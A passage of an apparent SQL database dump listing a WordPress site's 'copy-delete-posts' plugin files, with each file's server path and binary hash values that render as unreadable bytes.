\0\0\0','ڄͻ?qI','\n<*Bش{Ls٩Nlw\'{{','',0,'?'),(' ߒ\'Lc?Q','wp-content/plugins/copy-delete-posts/analyst/src/Mutator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Mutator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_N%fޕi/','4rio\Z8[^l+KXe`','',0,'?'),('c{*.-~b','wp-content/plugins/copy-delete-posts/analyst/src/Notices/Notice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Notices/Notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >2Ci,о','=|PT4x]N)u0wPk~','',0,'?'),('oE@QkD5','wp-content/plugins/copy-delete-posts/analyst/src/Notices/NoticeFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Notices/NoticeFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6SϏYF\nqn',':Fu|CH PK|8q','',0,'?'),('G> w ','wp-content/plugins/copy-delete-posts/analyst/src/helpers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3P\n#WE','mfer?qSC:=','',0,'?'),('+b#r%7DH','wp-content/plugins/copy-delete-posts/analyst/templates/forms/deactivate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/forms/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}oZCM\rBI','MoL%`gkr<\0{J,Q','',0,'?'),('\0-:͚?vk8p.N','wp-content/plugins/copy-delete-posts/analyst/templates/forms/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/forms/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ez4#z .','\n +aR{2WUJ2r\'','',0,'?'),('ܤz)EȣYÝ$.','wp-content/plugins/copy-delete-posts/analyst/templates/notice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X0.\\R','+cȤ@Ӷr\ZSpmG޵^','',0,'?'),('7U%;Z\r0','wp-content/plugins/copy-delete-posts/analyst/templates/optin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/optin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cZsݕL}','}3;2r9w_}!(S\Z=;\"^#f','',0,'?'),('l3F1B','wp-content/plugins/copy-delete-posts/analyst/templates/optout.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/optout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+X8V03','@|7veӕ1GzG_WwzN\0','',0,'?'),('E\" -t+φ$!','wp-content/plugins/copy-delete-posts/analyst/version.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$lҘP?ס','ckSav\0KbnzyveѨ6N','',0,'?'),('mHəÿ','wp-content/plugins/copy-delete-posts/assets/css/cdp-editor.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JW:8t\Z','8Dc=)Ql(3e8)w','',0,'?'),('},qQ|5~MÌA','wp-content/plugins/copy-delete-posts/assets/css/cdp-global.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-global.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>z','',0,'?'),('}N@{w&+','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraBold.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraBold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lMg[:F;','/#a_ig(,\rѼ@,w?`<','',0,'?'),('<@rqU14','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraLight.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraLight.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iy*J;,W','= ۮT3v!LƌOjy?A5ͧqT8','',0,'?'),('tjY/','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Italic.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Italic.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\e\"DgZMd','߂p%BIE&E\",K `^4a','',0,'?'),('iĉVYz|.','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Light.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Light.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|=d[]7c','wd8a,dq.:O*.\r-','',0,'?'),('f&!Sw','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Medium.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Medium.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nE%Ȕkܠ ','y! $+q,͂g**ĻZ2ů-','',0,'?'),('\'/8L','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Regular.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':])4\'','ė7kܿCs\\\'GQ/sQd','',0,'?'),(':jeoV-','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-SemiBold.woff2','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-SemiBold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ob>R\'X^','ΞG(-\0j\rk)\r','',0,'?'),('ؼ<_)S5','wp-content/plugins/copy-delete-posts/assets/imgs/alert_error.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(!4F ',',ev]koG7Cmwޅ(7','',0,'?'),('w´Ař|','wp-content/plugins/copy-delete-posts/assets/imgs/alert_info.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_info.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JT_7Y0`8̠','WH:0F36$~X','',0,'?'),('̅ TB0\nƳs','wp-content/plugins/copy-delete-posts/assets/imgs/alert_success.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.9a;\rT','xf9A/߰\\Md?驐1ϴB[','',0,'?'),('b9u%\"gAT','wp-content/plugins/copy-delete-posts/assets/imgs/alert_warning.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_warning.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W xÅ2c`','x~v%~-rK\nlW=','',0,'?'),('>l~X\\We\"','wp-content/plugins/copy-delete-posts/assets/imgs/arrow.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X1+\04 [','=xhһMU*&8\0\Zg^','',0,'?'),('썛-%XL GJ','wp-content/plugins/copy-delete-posts/assets/imgs/close.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/close.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Bג%*O','AD)̚iɪXkhOqGXNK','',0,'?'),('/皑\0Ch','wp-content/plugins/copy-delete-posts/assets/imgs/copy.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/copy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<R:NG9n','ΦE$\Z҄m:n@Ir2','',0,'?'),('K!1aGW@','wp-content/plugins/copy-delete-posts/assets/imgs/icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rM,4I|1C7\'','w|-3ls̑?i#0(B+|I6','',0,'?'),('P:^','wp-content/plugins/copy-delete-posts/assets/imgs/info.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/info.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5w7#;','_+ᷛ$rOo<{ksP','',0,'?'),('# KNp],G','wp-content/plugins/copy-delete-posts/assets/imgs/intro_1.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/intro_1.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۂfNև,pR','Pw4iycP\re@]oK4x','',0,'?'),('ރ͍&)rI6','wp-content/plugins/copy-delete-posts/assets/imgs/intro_2.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/intro_2.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A1he\"{6V',';A\"QC0ҧU2Ɔ$6d }','',0,'?'),('%#:۳w-7','wp-content/plugins/copy-delete-posts/assets/imgs/intro_3.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/intro_3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?~[\0(\'%H=','_BXg¹M cvEށ==\\.k','',0,'?'),('lm[*B ','wp-content/plugins/copy-delete-posts/assets/imgs/premium.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/premium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','','wp-content/plugins/copy-delete-posts/assets/imgs/stars.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/stars.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ul(6','Vޓ>5qpaXpX\rtK','',0,'?'),('\'VTheF~a','wp-content/plugins/copy-delete-posts/assets/js/cdp-bulk.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-bulk.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}T ( #.7آ/','x̨Tٞg0T.a%X','',0,'?'),('y2:nҳLp-','wp-content/plugins/copy-delete-posts/assets/js/cdp-global.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-global.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӝ\nwH|3tR','2-x\0-;KtN̓Loxn:','',0,'?'),('!P6!\Z','wp-content/plugins/copy-delete-posts/assets/js/cdp-gutenberg.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-gutenberg.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Gp\r!X\raW','|gZ3y\\Qk36','',0,'?'),('16ȳQナ','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/background-texture-grey.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/background-texture-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.¸f2','\'lrlSl:u6xQ','',0,'?'),('|8Y˧#\"','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SߕtY!S','s҅\n8)lic$%b','',0,'?'),('E1 9=P@','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uGm\"\"]','AcPo69\'Ey0','',0,'?'),('}63]FȜᛐɄǀ02\\s?ee \0d','',0,'?'),('4*6{ [','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 4.]1`','v÷$F>dTf dp,JTC','',0,'?'),('n0[DAp','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nKE#u\rg`]','-썈z ^\r7BύM','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/main-background-image.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/main-background-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z?&pDv','[ fcHt cR','',0,'?'),('``\r} ahn','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/secondary-background-image.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/secondary-background-image.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';^\"*\\A2','A|֕Ub?~;W&]A?L멠=','',0,'?'),('\Z\'}(@','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fJ&eyY3G$','I$Z\re^\0 g3 _','',0,'?'),('3I{\"G','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\rVZXhVDpo','2I \Zą+nϧN^noȝ;','',0,'?'),('\ZҰp|\ZF K`','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(:*PS?^kk','W^UB)f=;BL\0FCrR','',0,'?'),('^Ϋ)ƍ_','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','愈.4t','\Z6хq} v\0j#|','',0,'?'),('GyU.¬Wa&6','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-left.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-left.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cMzqe#g`','4ד]Wk(k]W\'ÐG9qV','',0,'?'),('\'\'^l{','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-right.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-right.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iD}=*4/\"','  4:-','',0,'?'),('*EҼ2','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-left.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-left.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dGU#4W',' D =\r[sk]` Jb','',0,'?'),('67=qe՚','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-right.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-right.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NF-Q:','cypqtr[~R(%b5rI%','',0,'?'),('ǼrԚ\rwl','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hwb\nA I=֤','\\ BOT\"4b~sIICeS','',0,'?'),('kt]\\PЪ','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Oc[pR;>;','Pʫ0pRo&P/_):vP','',0,'?'),('|yb\Z–M','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face1.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD]^\rH$o','XsfFر4 vk','',0,'?'),('\\K@!=?','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face2.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A^@//j/Ӡ','R; ax,\rG r?6tbp','',0,'?'),('2f`p)ir~8]','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face3.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-f:^gwlO','R(\":QCZ9kK<e','',0,'?'),('?ﶗܙƊ )C*','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face4.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2QT60w',' ++^* uHF PN1Wmڴ','',0,'?'),('LӕU\'k','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Q0yQJcJ','Z.;gzCeQ$pOt','',0,'?'),('1?ܳOWϙ}','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q3~v@c','BI7пɫigPپZRdg|','',0,'?'),('JbB5TG&','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-images.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-images.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bOs_df?u3','6=7j.4|?-ģ0R','',0,'?'),('f}V!I','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-green.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-green.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\'J.Z','(c%ufR ZRëE','',0,'?'),('ҊrA~\Z-?V9','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-grey.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bo.ŸKMSr\n','\'ArơE\n\r9[0\0*\0R-','',0,'?'),('} a9f %','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H ߙrO','P2Ysg\0 %ڬl܎1LX','',0,'?'),('l00eH>M+','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O S\'7N','C펵ȑqx効g\"dV9','',0,'?'),('3!','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d[J\0\"q`','T!`x2_qk+wݤ\Z}%','',0,'?'),('N/7oWo','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<v|Qw}:','y>z1/Gπ%Թ#8ph6Vh+','',0,'?'),('t5?~w* åO9','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'1ا}`![','ZR\Z8Wt~U5&`kl','',0,'?'),('~%:','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/background-top-left.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/background-top-left.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2ZV\'LZ,y','\0|I\n,\\B0t$','',0,'?'),('G(d0)ABm','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/big-colored-logo-rr.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/big-colored-logo-rr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~6-Uv8','B)$olj`;Xo^','',0,'?'),('yR2y$w<','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/not-colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/not-colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','98\Zn%\rlL','y\"`u1YܞhB`G','',0,'?'),('SϭˋD۽?','wp-content/plugins/copy-delete-posts/banner/views/projects/red/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gʏ|2=?@s','7Qû9?uF\\Pբ \r)׊CR','',0,'?'),('`%Lrח֘X','wp-content/plugins/copy-delete-posts/banner/views/projects/red/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' $GtU.\\:','S t\rѸ+!0x','',0,'?'),('bպJ)heC','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-1.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bɅ$ S\0^','^=|g)0&Qn J\'','',0,'?'),('d/v','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jjBMh4[','nL˸&|=IN2t\nW*qk','',0,'?'),('d8 M)Ko)','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',LI\'@P','>v%]7sCgKoeШ/e','',0,'?'),(' dž@jN','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o؞ ZC羧IfH','a,2%2>NJ}:-','',0,'?'),('aTKb=.D;0','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/colored-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/colored-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nqksX~%','ʎF![+˟.8CUU ','',0,'?'),('_EsV .','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7oa;>\0kG','OgO[?ͽJfh>t@5jjrW','',0,'?'),('wTAT+洘CP','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c#Z6UB\"<\'','ge/``ɘ\r\\x+{LBY','',0,'?'),('M8WiO','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/background-icons.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/background-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|#3>}T','ۤCSHW7+z28_E`gn','',0,'?'),('u\\j$;J$j*I','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/background-image.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/background-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nkt ڶ\Zo','4[ OQr1خ{cвC','',0,'?'),('h4NY8* z','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/big-colored-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/big-colored-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hp,-\nUH)o','ǃNȂ sd0\"Sygp;爷Yx','',0,'?'),('>>jjNS','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/play-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/play-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' `=DnՔ ','\r?\rJ|.t;O|','',0,'?'),(':&(\r L','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/ribbon-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/ribbon-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ 4A>Jt#C','VS4qù:U^tnFGWmkSjJ','',0,'?'),('Y>sUdtą8p:','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/video-background.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/video-background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NIx>\'KNh7$t','ŋ=^3hk;p^%im','',0,'?'),('f񐔾hpdNg','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/white-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/imgs/white-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&8<2:I','#eKOqA>~ p 4e &\0t','',0,'?'),('0F=&:I','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z2jذRa','sĘn\ZzHFv1Fh:Jz','',0,'?'),('*k 